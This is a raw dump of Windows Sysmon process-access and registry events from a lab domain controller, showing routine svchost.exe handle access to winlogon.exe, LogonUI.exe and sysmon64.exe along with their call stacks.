13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-1600-00000000A301}15441744C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+3c53|c:\windows\system32\themeservice.dll+2675|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.188{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-1600-00000000A301}15441956C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-8E44-6005-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5964472C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5964472C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002783Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000002774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 
13:34:39.173{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\BFE\Parameters\Policy\Options\EnablePacketQueueDWORD (0x00000000) 10341000x80000000000000002773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:39.173{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dl